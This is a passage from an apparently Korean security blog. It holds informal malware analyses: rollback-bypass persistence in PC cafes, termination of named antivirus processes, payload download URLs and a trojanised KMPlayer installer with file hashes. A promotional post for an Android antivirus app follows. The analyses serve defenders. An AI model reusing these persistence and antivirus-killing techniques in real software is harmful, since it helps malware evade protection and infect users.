자신을 userinit.exe를 덮어씌우는 것으로 보인다.

※ 참고사항 ※ 
해당 프로세스들은 ComBack 프로그램으로써 PC방에 많이 사용되는 롤백 프로그램이다.
프로세스가 존재하면 PC방으로 판단하고, 롤백시에도 악성파일이 동작할 수 있도록 조작하는 것으로 추측된다.


C:\Program Files\IZEX\ComBack6.0 IR Pro\IRPro.exe
C:\Program Files\IZEX\ComBack5.0 IR Pro\Remon.exe
C:\Program Files\IZEX\ComBack6.0 IR Pro\SpStart.exe  

좀 더 확인해보니, ComBack 프로세스가 존재 하면 "Z 드라이브"명으로 윈도우가 설치 된 드라이브를 복사하는 것으로 확인되었다.
따라서 롤백을 하더라도 "C 드라이브(보통 윈도우가 설치 된 드라이브)"를 복원하더라도 악성파일은 Z 드라이버에 설치 된 악성파일을 이용하여 지속적으로 감염을 시킬 수 있다.


Com32.dll 은 국내 보안프로그램의 프로세스를 체크하여 종료시킨다.
ALYac.aye
AYRTSrv.aye
AYServiceNT.aye
Nsavsvc.npc
nsvmon.npc
NVCAgent.npc
v3light.exe
v3lsvc.exe
v3ltray.exe

추가적으로 파일을 다운로드 시킨다.
http://67.198.1**.2**/20120120.jpg
http://67.198.1**.2**/20120120.exe
C:\Documents and Settings\[사용자계정]\Local Settings\Temp\20120120.exe 


Com32.sys 파일은 com32.dll과 com32.sys 파일접근을 보호하며, 특정 프로세스에는 접근을 허용시킨다.
허용 프로세스 : IEXPLORER.EXE, explorer.exe, rundll32.exe

또한 Major Function Hooking 한다.
(다른 행위도 있어 보이는데~ 귀찮어 ㅠ.ㅠ)
[0] IRP_MJ_CREATE
[2] IRP_MJ_CLOSE
[14] IRP_MJ_QUERY_SECURITY


- 20120120.exe (알약 탐지명 : Trojan.Dropper.OnlineGames.imm)
감염 된 시스템에 정상 파일인 imm32.dll 을 변조시키고, 악성파일을 생성한다.

C:\Windows\System32\imm32.dll (알약 탐지명 : Spyware.OnlineGames.imm)
C:\Windows\System32\d3dx9_09.dll (알약 탐지명 : Spyware.OnlineGames.imm)

변조 된 imm32.dll은 5 Byte Patch를 통해 악성 파일인 d3dx9_09.dll 를 부팅 시 자동으로 로드시킨다.



결론은 내일써야지 ㅡ.ㅡ; 졸리다!!
블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.



뉴스에서 하도 떠드니~ A양이 누군지는 알것이다.
하지만 모르는 사람도 분명있다. 그래서 검색을 하게 된다(사람이니까 ㅡㅡㅋ)

그런 심리를 이용하여 악성파일을 뿌리는 행위가 존재한다....이 파일이 바로 그런 식이다.

유포는 카페와 블로그 첨부파일, 그리고 SNS로 빠르게 전파되었다.
(현재는 다운로드 자체가 막혀있음!! 그래서 주소를 공개하였으니 ㅋㅋ 다운로드 노력하지마시오!!)




이렇게 전파 된 압축파일은 exe압축으로 되어있으며, 더블클릭으로 쉽게 실행 될 수 있다.






압축해제가 완료 되면 "C:\NewFolder" 폴더에 아래와 같이 압축을 해제한다.
(더블클릭으로 실행 될 경우는 악성파일은 이미 실행되어 보이지 않는다, 아래의 화면은 강제로 압축을 해제한 모습이다)


제작자는 집요하게 전파를 위해 txt 파일을 하나 만들어 두었다.



압축이 해제되면서 netsecurity.exe가 실행되면, 시스템폴더에 netdrvsrty.exe 파일을 생성한다.


부팅 후 자동시작을 위해 Run 레지스트리에 등록 된다.
(HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"netsecurityDRV" = "C:\WINDOWS\system32\netdrvsrty.exe")




이렇게 실행 된 악성파일은 특정 서버에 접속하여 악의적인 행위를 수행할 것으로 판단된다.
아직 정확한 분석은 안되어서 분석내용이 없음 ㅋㅋ 그냥 주의하라고 적은 포스팅!!

현재 알약에서는 Trojan.Dropper.Agent.DRV, Trojan.Agent.DRV 로 탐지되오니, 항상 보안프로그램의 실시간을 켜두시길^^




글을 다 쓰고 보니 ㅡㅡㅋ 제목에만 A양이지;; 파일에는 이름이 다보이네;; 귀찮으니 패스!! 

블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.


국내 멀티미디어 재생프로그램인 케이엠플레이어(KMPlayer) 설치 파일이 변조되어 백도어가 설치되고 있다.

변조 된 파일은  The KMPlayer 3.0.0.1442 릴리즈버전으로 정상적인 파일정보는 아래와 같다.

File: KMPlayer_KR_3.0.0.1442_R2.exe (13,004,472 Bytes) - 정상 셋업 파일 정보
CRC-32: 6fc879b5
MD4: eff203146b06f5b3df657c940c17ee58
MD5: 01499e9fe650cc8fa09f80238564ea6b
SHA-1: dac91c04935f9cf0f3d8986471919700dec4578c


하지만 변조 된 파일은 아래의 정보를 갖는다.

KMPlayer_KR_3.0.0.1442_R2.exe (13,606,912 Byte) - 변조 된 셋업 파일 정보

CRC-32: 7c121bce
MD5: df09ccc1c473aae3e2cc4b0cfb37dd2f
SHA-1: 99b456d8d1474a20c8d464f7aeac81f71a2dfc12


정보만 비교해봐도 602,440 Byte가 증가한것을 볼 수 있다.

그렇다면 증가한 숫치만큼 생성 된 코드는 무엇인가라는 궁금증이....!! (이런 직업병;; 12MB를 봐야하는건가 ㅠㅠ )
다행스럽게 시작코드를 살펴봤더니 시작점에서 Resource에 담겨진 2개의 파일을 생성 후 실행하는 것이 확인되었다.

실제 파일에는 BIN이라는 리소스에 NORMAL 과 SOURCE 이름으로 2개의 리소스를 가지고 있었다.



이 중 NORMAL은 말그대로 KMPlyaer의 정상 셋업파일이며, SOURCE 가 백도어 파일을 만드는 드롭퍼이다.

코드상으로는 %TEMP% 폴더의 경로를 찾은 후
백도어를 만드는 드롭퍼의 이름을 "I(랜덤)a(랜덤)l(랜덤)r.exe" 로 생성하고,
정상 KMPlayer 셋업파일을 "e(랜덤)a(랜덤)l(랜덤)r.exe" 로 생성하고 실행시킨다.



실제 동작을 시켜보니, 정상 KMPlayer 설치가 진행되면서 악성행위도 동시에 이루어 지고 있었다.



C:\Documents and Settings\(사용자명)\Local Settings\Temp 폴더에 아래와 같이 정상파일과 악성파일이 드롭된다.



특히 드롭퍼는 Microsoft 파일로 위장하고 있다.(실행 후 삭제되면서 ㅡㅡㅋ 위장할 필요가 ㅋㅋㅋㅋㅋㅋ)



이후 악성파일 드롭퍼는 C:\WINDOWS\system32 폴더에 악성 dll 파일을 드롭시킨다.
dll파일도 악성파일 생성과 비슷하게 랜덤문자열과 고정문자열로 이루어진다.(귀찮아서 ㅡㅡㅋ 패스!!)



또한 악성 dll은 시스템 부팅 시 자동시작을 위해 서비스 레지스트리를 생성하여 등록한다.


이후 dll이 하는 행위는 따로 분석하지 않았다.
아래 탐지명에 보이듯이 DDoS를 하는 파일일테니 ㅎㅎㅎ

알약에서는 악성 Dll을 Trojan.DDoS.Agent.ulo 로 탐지 중이다.



현재 시간 11월 27일(12시 28분) 이 시간에도 아직 셋업파일은 수정되고 있지 않다.
빠른시일안에 수정이 되길 바란다.

 
블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.


이스트소프트(ESTsoft)에서는 좀 더 강력한 보안설정을 슬로건으로 한 "알약 안드로이드 프리미엄"을 발표하였다.

이번 알약 안드로이드 프리미엄은 기존의 알약 안드로이드보다 보안기능이 많이 추가되었으며, 사용자편의를 대폭 상승한 것으로 
보여진다. 

기존의 알약 안드로이드는 무료였지면, 해당 프리미엄 제품은 아쉽게도 유료 제품이며 사용 가능한 OS는 Android 2.2 / 2.3 버전이다.


그럼 홈페이지에 기재 된 알약 안드로이드 프리미엄의 기능들을 잠시 살펴보자.

- 검사하기(강력한 악성 패키지 및 비정상 파일 검사)
알약 안드로이드 프리미엄은 악성패키지를 설치하지 않아도 악성 패키지 파일(APK)을 탐지하여 치료할 수 있으며,
스마트폰 내 비정상적으로 변형되거나 설치가 되지 않는 파일까지도 검사를 지원합니다.

- SD카드 검사 설정 지원
알약 안드로이드 프리미엄은 사용자가 SD카드 검사 여부를 선택하여, 검사속도를 빠르게 또는 정밀하게 진행함으로써,
사용자 맞춤형 검사를 지원합니다.

- 네트워크 관리(네트워크 보안 등급 제공으로 무선보안 강화)
알약 안드로이드 프리미엄은 무선 네트워크를 통한 공격으로부터 스마트폰을 안전하게 보호하기 위해 WiFi 보안 등급 및 상세 정보를 제공하며, 스마트폰이 무선 네트워크에 자동으로 연결되는 즉시 해당 WiFi 정보를 분석하여 보안 위협 여부를 알림으로써, 사용자 의지와 상관없이 무선 네트워크에 접속하는 경우를 확인 및 차단할 수 있습니다.

- WiFi 즐겨 찾기 제공
알약 안드로이드 프리미엄은 사용자가 1회 이상 접속한 무선 네트워크에 대해 자동으로 즐겨찾기 등록 및 관리함으로써 안전하고 간편하게 무선 네트워크를 이용할 수 있습니다. 또한, WiFi 연결 및 해제 등 무선 네트워크 연결 관리 기능과 WiFi 연결 횟수 및 최근 연결일자 등 네트워크 접속 관리 기능을 제공합니다.

- 스마트폰 최적화(향상된 App 관리와 캐시 관리로 가볍고 빠르게 스마트폰 사용환경 최적화)
알약 안드로이드 프리미엄은 기존 실행 중인 App 관리보다 더욱 강력하게 App을 정리하며, App 필요성에 따라 사용자가 종료제외를 설정함으로써 쾌적한 스마트폰 사용 환경을 제공합니다. 또한, 사용자 정보 및 App 자료를 보관하고 있는 캐시를 삭제함으로써 개인 정보를 보호하고, 더욱 빠르고 가벼워진 스마트폰 사용환경을 제공합니다.

- App관리(한 번의 터치로 App 관리를 간편하게 설정)
알약 안드로이드 프리미엄은 App 설치 후 안전 등급 알림 시, 숨어 있던 App 설정 기능을 화면에 표시함으로써 손쉽게
App 관리를 진행할 수 있습니다.

- 스팸관리(변종된 스팸 문자메시지까지 지능적으로 차단하는 스팸 관리)
알약 안드로이드 프리미엄은 특수문자를 이용한 변종 스팸 문자메시지들의 패턴을 분석하여 필터링함으로써,
스팸 메시지 탐지율을 한층 더 향상했습니다.

- 설정(자동화 설정 기능으로 간편하게 스마트폰 보안관리)
알약 안드로이드 프리미엄은 사용자가 직접 업데이트할 필요 없이 자동으로 DB 업데이트를 진행 및 적용하며,
매주 2회 이상 꾸준히 업데이트 됩니다. 또한, 실행 중인 App과 캐시 파일을 자동으로 종료 또는 삭제하도록 지원함으로써,
최상의 스마트폰 사용환경을 유지하도록 도와줍니다.

- 위젯(알약의 주요 기능을 위젯으로 바로 관리)
검사하기, 실행 중인 App 종료, 캐시 삭제, WiFi 사용설정 등 알약을 실행하지 않아도 홈화면에서 알약 위젯으로 주요 기능을 사용하실 수 있습니다.





알약 하나로 대부분의 안드로이드 기능을 사용할 수 있다면  그것이 정말 통합보안솔류션이지 않을까 싶다!!
지속적으로 좋은 기능이 많이 추가 되었으면 한다.



블로그 이미지

잡다한 처리

이것 저것 끄적여 보는 공간으로 만들었습니다.